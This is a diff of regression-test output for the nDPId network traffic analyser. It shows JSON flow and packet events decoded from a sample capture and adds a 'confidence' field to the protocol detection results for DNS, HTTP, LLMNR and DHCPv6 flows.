+00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1112,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104414395,"flow_last_seen":1470104414402,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":147,"midstream":0,"ts_msec":1470104414402,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"dl-obs.official.line.naver.jp","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.69.81.73"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1113,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414404,"flow_last_seen":1470104414404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1470104414404,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1470104414404,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1470104414404,"pkt":"TF4M6gNlYMVHBbyMCABFAABA+kNAAEAGXi3AqAUQy0VRSdF7AFCoMQrOAAAAALAC\/\/8cMAAAAgQFtAEDAwUBAQgKGg+ZqwAAAAAEAgAA"}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1116,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414404,"flow_last_seen":1470104414404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1470104414404,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -461,14 +461,14 @@
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1118,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":3,"flow_last_seen":1470104414407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104414407,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0pGZAAEAGtBbAqAUQy0VRSdF7AFCoMQrPv\/BSvYAQEBXAXgAAAQEIChoPma4bhF1G"}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1119,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":2,"flow_last_seen":1470104414407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1470104414407,"pkt":"ABxCjnAxTF4M6gNlCABFAAA8AABAADsGXXXLRVFJwKgFEABQ0Xzxz9ee9giQ0aAScSCl7QAAAgQFtAQCCAobhF1HGg+ZrAEDAwU="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1120,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":3,"flow_last_seen":1470104414407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104414407,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0fmZAAEAG2hbAqAUQy0VRSdF8AFD2CJDR8c\/Xn4AQEBU1wQAAAQEIChoPma4bhF1H"}
-00808{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1121,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414404,"flow_last_seen":1470104414408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1470104414408,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"dl-obs.official.line.naver.jp","url":"dl-obs.official.line.naver.jp\/r\/talk\/m\/4697716971500\/preview","code":0,"content_type":"","user_agent":"DESKTOP:MAC:10.10.5-YOSEMITE(4.7.2)"}}
-00808{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1122,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414404,"flow_last_seen":1470104414408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1470104414408,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"dl-obs.official.line.naver.jp","url":"dl-obs.official.line.naver.jp\/r\/talk\/m\/4697716954688\/preview","code":0,"content_type":"","user_agent":"DESKTOP:MAC:10.10.5-YOSEMITE(4.7.2)"}}
+00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1121,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414404,"flow_last_seen":1470104414408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1470104414408,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"dl-obs.official.line.naver.jp","url":"dl-obs.official.line.naver.jp\/r\/talk\/m\/4697716971500\/preview","code":0,"content_type":"","user_agent":"DESKTOP:MAC:10.10.5-YOSEMITE(4.7.2)"}}
+00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1122,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414404,"flow_last_seen":1470104414408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1470104414408,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"dl-obs.official.line.naver.jp","url":"dl-obs.official.line.naver.jp\/r\/talk\/m\/4697716954688\/preview","code":0,"content_type":"","user_agent":"DESKTOP:MAC:10.10.5-YOSEMITE(4.7.2)"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1171,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104416855,"flow_last_seen":1470104416855,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104416855,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1171,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1470104416855,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1470104416855,"pkt":"AQBeAAD8uKxvwfbSCABFAAA3J2UAAAERi4vAqGUh4AAA\/PVmFOsAI\/xOWbQAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"}
-00609{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1171,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104416855,"flow_last_seen":1470104416855,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104416855,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1171,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104416855,"flow_last_seen":1470104416855,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104416855,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1172,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104416855,"flow_last_seen":1470104416855,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104416855,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1172,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1470104416855,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1470104416855,"pkt":"AQBeAAD8cPGh+Cr9CABFAAA3CxAAAAERB\/nAqAUJ4AAA\/PVmFOsAI1xnWbQAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"}
-00606{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1172,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104416855,"flow_last_seen":1470104416855,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104416855,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1172,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104416855,"flow_last_seen":1470104416855,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104416855,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1173,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":2,"flow_last_seen":1470104416958,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1470104416958,"pkt":"AQBeAAD8uKxvwfbSCABFAAA3J2cAAAERi4nAqGUh4AAA\/PVmFOsAI\/xOWbQAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1174,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":2,"flow_last_seen":1470104416959,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1470104416959,"pkt":"AQBeAAD8cPGh+Cr9CABFAAA3CxIAAAERB\/fAqAUJ4AAA\/PVmFOsAI1xnWbQAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1200,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104419061,"flow_last_seen":1470104419061,"flow_idle_time":7440000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":101,"flow_avg_l4_payload_len":101,"midstream":1,"ts_msec":1470104419061,"l3_proto":"ip4","src_ip":"31.13.87.1","dst_ip":"192.168.5.16","src_port":443,"dst_port":53578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -477,220 +477,220 @@
 02028{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1202,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":3,"flow_last_seen":1470104419103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1223,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1223,"pkt_l4_len":1189,"ts_msec":1470104419103,"pkt":"TF4M6gNlYMVHBbyMCABFAAS5ltxAAEAGY5zAqAUQHw1XAdFKAbtfrKXFbgEjQ4AYEACgIgAAAQEIChoPq\/udMIh3FwMDBIB0Q7hbcg3gGVYTMrb0Tw1ukR9UWDAVBAtnbbvKcZJuPb4APoiSa8Bqy8MZbEZYSbOXsH6FRBiOXgQXR63aPZc\/hbpffrKKNOrKdGE28RcTBjPmf5KXRAiotID0urgwFwaynRtP+jd28hq9wG7na42EI3czkeebegJ7Hfqlh5eZl4Vnp3HXS2vj3pkfDjxrZNE1RoOaEkc+zGmnNTU0pYUiN9oTvOxyCvhMy7fmLDw2wNiIlnohv3qHV8HD46rBGW31Av40VD\/q5qbqM\/qLmRKpL9p4844aHi0K6ueq0ZT6TMs6WDgIPrhbY3XHMcMOatt\/ady86wYTLrgpENkDcutzNwuaAPbT+EcTuorA74M2F\/nruolPShszJ2UqNq\/Kb53\/C73zGS79aq0H4GQVpGLbiCEPEKZelcdnRDWAFlFD1De4jjpnV6eSGf0bsjdHkkSXOtKgo9fVDPltH7d4AfIVmOrYXnB4XaFQ7sqjoXmFP04T\/UZ9alTbXHhky07Nt8ZpZ+IsF6Mw7DMnQdlgdIAyTuc7JHD\/Ok90niXYhq4NzT+82L50EtJnB33J3Hke7h3o3sgTaNpQXdNfC2YJvtxEi753mIKXu+MBZEwy9ZPQaN73qXC\/OuiBukllab3YR64oWLHBb9R9Cob1usnX3xEd01XJDB4TsRXGV\/R4o29fk4M2bIFdhCdZZxbrlSOnlAJcyXFDgvxxi2r1OxtCdDnw2p7YYdruVdteggpuz3KWAxQf0xX6bEO4WvjFfVmqekT\/CcvxbftJ0OPvtUNbAmIMdzByrRWcH1KlE+Vp1L\/hC9R9Bs3ZcFYrVLmIjOjuR6dZM0gvCNqW+59Duv8pYvq5EskshSuV+VZXQgSphi1zRgwOIMQ80OXjfOd22IffY4fDrlfus1x+wyxpIvDhkq\/80yQo8lPgVUp5LrkwFv8MzfZEG9QVTX5NzJ4ld3sKhU430m+NFzViUapPGRtbxukso3sgavTRg8JkLGw0Wu4KmdOfCPycSYYMtX8wKXnZK3VItDYdup7QRof+kXjKmph54jb48oKmkP1E+fFyArD7x9lonAQ9p5aPKUKzZSnZg3s2QTvBrHxZHDUUh\/GiPymMFletcBA29rvJBTe5sh56A9o976AcTzrk2LtWjfifRRuCloaa709oX8j2NbS2T6fnPB7k5F2xcXniikiRI4m5Wr1rKwzBOYPeISDSO0Iag3\/qLAF4MYdHlpTmWSwUwPziE1P5k6JOH5aZI8e0Q7f0ZxLoqs1jZ2iVmphMqYY9PJIQOnlyUxXdzMxGkRPxC7nkXRnaVTa1Jic4cqbBA0o4E1jc9+EGwh1+8Xvom\/2X552fI1RWakGy58LTHqErwe5sAM83mOIz30W4kVNgLTYM0IjNdR3qa8WogmdKAZ3AFlzKnQVYuwcLo1Z88j+7WQ1aASRKMsinZvu7EijyrunTKJR37AcZ28FtpqOjfm2723l5Y4Ue3NHUMyl8JxA0FHtAmvTh7ijEjAuZW2F1kyMK9I8qLUk6J5HZwZruiDHIIjM="}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1231,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104420438,"flow_last_seen":1470104420438,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1470104420438,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":61172,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1231,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1470104420438,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":87,"pkt_l4_len":33,"ts_msec":1470104420438,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACERAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD7vQU6wAh24kTvAAAAAEAAAAAAAAHc29udXNhdgAAAQAB"}
-00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1231,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104420438,"flow_last_seen":1470104420438,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1470104420438,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":61172,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1231,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104420438,"flow_last_seen":1470104420438,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1470104420438,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":61172,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1232,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":2,"flow_last_seen":1470104420540,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":87,"pkt_l4_len":33,"ts_msec":1470104420540,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACERAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD7vQU6wAh24kTvAAAAAEAAAAAAAAHc29udXNhdgAAAQAB"}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1233,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104420541,"flow_last_seen":1470104420541,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1470104420541,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":59730,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1233,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1470104420541,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"ts_msec":1470104420541,"pkt":"AQBeAAD8PKn0WgOECABFAAA1H\/gAAAER9C\/AqAPs4AAA\/OlSFOsAIfhUE7wAAAABAAAAAAAAB3NvbnVzYXYAAAEAAQ=="}
-00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1233,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104420541,"flow_last_seen":1470104420541,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1470104420541,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":59730,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1233,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104420541,"flow_last_seen":1470104420541,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1470104420541,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":59730,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1234,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1470104420541,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1470104420541,"pkt":"\/\/\/\/\/\/\/\/rCILUFkxCABFAABEAABAAEARLlc7eNDa\/\/\/\/\/8PnB5sAMKByU3Uyb1ZTdDRBQUJIWlc1MGNtbGpaVjlCVUVOZlozVmxjM1FBYldVQQ=="}
 00908{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1250,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1470104422079,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":391,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":391,"pkt_l4_len":337,"ts_msec":1470104422079,"pkt":"MzMAAAABwKC7c+tXht1gAAAAAVERgCABsCAABgAAwqC7\/\/5z61f\/AgAAAAAAAAAAAAAAAAAB9gD2AAFRLwf\/D9rVoADAoLtz61cgAbAgAAYAAMKgu\/\/+c+tXAAACACcBREdTLTEyMTAtMTBQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFN3aXRjaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMy4xMC4wMTMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAoLtz61dCMQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFFQMFIxRDkwMDAwMjYAAAAAAAAAAAAAAAAAAAAAAAAAREdTLTEyMTAtMTBQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMCojIz\/\/wAAUG9ydCA4AAAgAbAgAAYAAMKgu\/\/+c+tXQA=="}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1270,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104423202,"flow_last_seen":1470104423202,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1470104423202,"l3_proto":"ip6","src_ip":"fe80::f65c:89ff:fe89:e607","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1270,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1470104423202,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"ts_msec":1470104423202,"pkt":"MzMAAQAC9FyJieYHht1gD8\/5ACwRAf6AAAAAAAAA9lyJ\/\/6J5gf\/AgAAAAAAAAAAAAAAAQACAiICIwAsGIELuXYqAAEADgABAAEeo3uS9FyJieYHAAYABAAXABgACAAC\/\/8="}
-00616{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1270,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104423202,"flow_last_seen":1470104423202,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1470104423202,"l3_proto":"ip6","src_ip":"fe80::f65c:89ff:fe89:e607","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"proto":"DHCPV6","breed":"Acceptable","category":"Network"}}
+00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1270,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104423202,"flow_last_seen":1470104423202,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1470104423202,"l3_proto":"ip6","src_ip":"fe80::f65c:89ff:fe89:e607","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}}
